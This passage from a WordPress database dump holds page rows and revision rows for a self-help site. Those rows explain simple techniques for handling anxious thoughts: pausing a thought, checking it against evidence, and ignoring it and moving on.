have that supports my thought that my daughter has had a terrible road traffic accident?â€. As Susan would look for evidence, she would soon realise that she actually does not have any evidence that her daughter has met with a road traffic accident. I.e. there are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, she would realise that she has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Susanâ€™s unhelpful thoughts would fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Susanâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Susanâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined unhelpful thought would have caused her to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Susan uses the reality check tool, her daughter walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today our school bus got held up!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the unhelpful thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the unhelpful thought is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with unhelpful thoughts, there will be little or no evidence to support it. Once one realises that, the unhelpful thought should fade away.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'publish', 'closed', 'closed', '', 'reality-check', '', '', '2023-08-09 18:35:24', '2023-08-09 18:35:24', '', 0, 'https://www.happythinking.com/?page_id=1655', 0, 'page', '', 0),
(1656, 1, '2023-05-30 18:28:34', '2023-05-30 18:28:34', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with unhelpful thinking patterns. A common feature of unhelpful thinking patterns is that often they are unhelpful because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination. Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the unhelpful thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ Let us continue with our example from the previous section, where Jayâ€™s partner was only ten minutes late returning home from work and he was having the unhelpful thought, â€œShe must have met with a terrible road traffic accidentâ€. Jay first uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself.&nbsp; He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. There are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, he realises that he has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Jayâ€™s unhelpful thought dies away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Jayâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Jayâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined unhelpful thought would have caused him to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Jay uses the reality check tool, his partner walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the unhelpful thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the unhelpful thinking is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with unhelpful thoughts, there will be little or no evidence to support it. Once one realises that, the unhelpful thought should fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-05-30 18:28:34', '2023-05-30 18:28:34', '', 1655, 'https://www.happythinking.com/?p=1656', 0, 'revision', '', 0),
(1657, 1, '2023-05-30 18:30:13', '2023-05-30 18:30:13', '<!-- wp:paragraph -->\n<p>In our minds, various thoughts appear and quickly spread into different areas. These thoughts may be helpful thoughts or unhelpful thoughts, and happy thinking is about applying tools to deal with the unhelpful ones. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first pause it so that it can â€œhearâ€ you. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, you may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once you get her attention, you may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses an unhelpful thought occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more unhelpful thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example. Letâ€™s imagine that a person, who we will call Jay, is a very anxious person and he is at his home waiting for his partner to return from work. He looks at the clock and notices that it''s ten minutes past the time that his partner normally returns home from work. Imagine that at this point, Jayâ€™s mind generates the following unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€ At this point, this thought is unhelpful because there is no information to say that an accident has actually happened, and there are so many other less serious options such as being stuck in traffic. Jayâ€™s mind is simply â€œassumingâ€ that an accident has happened, when actually, at this point there is no information to support that thought. So at this point, Jayâ€™s incorrect assumption is making him unnecessarily worry. Jay is aware that he suffers from anxiety and he has some suspicions that his thoughts are probably unhelpful. So his first step is to pause the thought, and he does this by using his internal voice and saying to his mind, â€œpauseâ€. This will briefly pause his unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this all that had to be done for unhelpful thoughts, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once an unhelpful thought has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. â€œby saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold an unhelpful thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner_voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality_check_tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-05-30 18:30:13', '2023-05-30 18:30:13', '', 1650, 'https://www.happythinking.com/?p=1657', 0, 'revision', '', 0),
(1658, 1, '2023-05-30 18:32:20', '2023-05-30 18:32:20', '<!-- wp:paragraph -->\n<p>In the previous section, you learnt about a few psychological tools that you can use to deal with unhelpful thinking and I will share more such tools with you later. When using tools such as the reality check tool, often one will find that when using the tool, the unhelpful thought just fades away, almost as if that thought realises on its own that it is no longer valid.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, sometimes one may find that an unhelpful thought may still â€œhang aroundâ€ in oneâ€™s mind even after a tool has been used to â€œneutraliseâ€ it. If this were to happen, it is crucial that one does not â€œpushâ€ the unhelpful thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows that the unhelpful thought does not necessarily represent reality. Ultimately a thought that one ignores will disappear, just like if one ignores a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Susanâ€™s daughter was 15 minutes late returning home from school and Susan was having the unhelpful thought, â€œShe must have had a terrible road traffic accidentâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this situation, Susan first uses the â€œpause toolâ€ where she uses her internal voice and says â€œpauseâ€ to herself. She then applies the reality check tool to the paused thought, and asks herself, â€œWhat actual evidence do I have that supports my thought that my daughter has had a terrible road traffic accident?â€. As Susan looks for evidence, she realises that she actually does not have any evidence that her daughter has met with a road traffic accident. Since she still has the unhelpful thought lingering in the background of her mind, she decides to use the â€œignore &amp; move onâ€ tool. Using her internal voice, she says to the thought, â€œI will ignore you and move onâ€. While Susan knows that the unhelpful thought is still lingering in her mind, she doesnâ€™t react to it and just lets it be. She then moves her attention to a different thought, which on this occasion happens to be thinking of what she will be cooking for dinner. Eventually, Susanâ€™s unhelpful thought fades away, avoiding her having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker. Eventually, you will find yourself using these tools almost automatically.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'publish', 'closed', 'closed', '', 'ignore-move-on', '', '', '2023-08-09 18:39:13', '2023-08-09 18:39:13', '', 0, 'https://www.happythinking.com/?page_id=1658', 0, 'page', '', 0);
INSERT INTO `wpou_posts` VALUES
(2076, 1, '2023-08-09 18:39:11', '2023-08-09 18:39:11', '<!-- wp:paragraph -->\n<p>In the previous section, you learnt about a few psychological tools that you can use to deal with unhelpful thinking and I will share more such tools with you later. When using tools such as the reality check tool, often one will find that when using the tool, the unhelpful thought just fades away, almost as if that thought realises on its own that it is no longer valid.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, sometimes one may find that an unhelpful thought may still â€œhang aroundâ€ in oneâ€™s mind even after a tool has been used to â€œneutraliseâ€ it. If this were to happen, it is crucial that one does not â€œpushâ€ the unhelpful thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows that the unhelpful thought does not necessarily represent reality. Ultimately a thought that one ignores will disappear, just like if one ignores a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Susanâ€™s daughter was 15 minutes late returning home from school and Susan was having the unhelpful thought, â€œShe must have had a terrible road traffic accidentâ€.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In this situation, Susan first uses the â€œpause toolâ€ where she uses her internal voice and says â€œpauseâ€ to herself. She then applies the reality check tool to the paused thought, and asks herself, â€œWhat actual evidence do I have that supports my thought that my daughter has had a terrible road traffic accident?â€. As Susan looks for evidence, she realises that she actually does not have any evidence that her daughter has met with a road traffic accident. Since she still has the unhelpful thought lingering in the background of her mind, she decides to use the â€œignore &amp; move onâ€ tool. Using her internal voice, she says to the thought, â€œI will ignore you and move onâ€. While Susan knows that the unhelpful thought is still lingering in her mind, she doesnâ€™t react to it and just lets it be. She then moves her attention to a different thought, which on this occasion happens to be thinking of what she will be cooking for dinner. Eventually, Susanâ€™s unhelpful thought fades away, avoiding her having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker. Eventually, you will find yourself using these tools almost automatically.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-08-09 18:39:11', '2023-08-09 18:39:11', '', 1658, 'https://www.happythinking.com/?p=2076', 0, 'revision', '', 0),
(1659, 1, '2023-05-30 18:32:20', '2023-05-30 18:32:20', '<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the previous section, you learnt about the â€œreality checkâ€ tool. When using that tool, most of the time, one will find that when looking for evidence to support the unhelpful thought, that thought just disappears, almost as if that thought realises on its own that it is no longer valid. However, sometimes one may find that even though one has shown that there is little evidence to support an unhelpful thought, that thought may still â€œhang aroundâ€. If this were to happen, it is crucial that one does not â€œpushâ€ the unhelpful thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows, by using the reality check tool, that the unhelpful thought does not represent reality. Ultimately a thought that one does not react to will disappear, just like if one does not react to a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Jayâ€™s partner was a bit late returning home from work. You will note that one can often use multiple combinations of tools together. This is sort of like how a mechanic will often use more than one tool when repairing a machine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So putting all this together, let''s see an example of the â€œIgnore/ Move onâ€ tool in use.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We start with Jayâ€™s partner not being home 10 minutes past the usual time she normally returns home from work. Jay has the unhelpful thought, â€œShe must have had a terrible road traffic accidentâ€. Jay then uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself. He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. Since he still has the unhelpful thought lingering in the background of his mind, he decides to use the ignore &amp; move on tool. Using his internal voice, he says to himself â€œIgnore and Move onâ€. He doesnâ€™t react to the unhelpful thinking and lets it be. He then moves on to a different thought, which on this occasion happens to be thinking of what he will be cooking for dinner. Eventually, Jayâ€™s unhelpful thinking fades away, avoiding him having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality_check_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/unhelpful_thinking_patterns/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-05-30 18:32:20', '2023-05-30 18:32:20', '', 1658, 'https://www.happythinking.com/?p=1659', 0, 'revision', '', 0),
(1660, 1, '2023-05-30 18:33:55', '2023-05-30 18:33:55', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with unhelpful thinking patterns. A common feature of unhelpful thinking patterns is that often they are unhelpful because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination. Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the unhelpful thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ Let us continue with our example from the previous section, where Jayâ€™s partner was only ten minutes late returning home from work and he was having the unhelpful thought, â€œShe must have met with a terrible road traffic accidentâ€. Jay first uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself.&nbsp; He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. There are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, he realises that he has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Jayâ€™s unhelpful thought dies away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Jayâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Jayâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined unhelpful thought would have caused him to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Jay uses the reality check tool, his partner walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the unhelpful thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the unhelpful thinking is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with unhelpful thoughts, there will be little or no evidence to support it. Once one realises that, the unhelpful thought should fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause_tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore_move_on_tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- 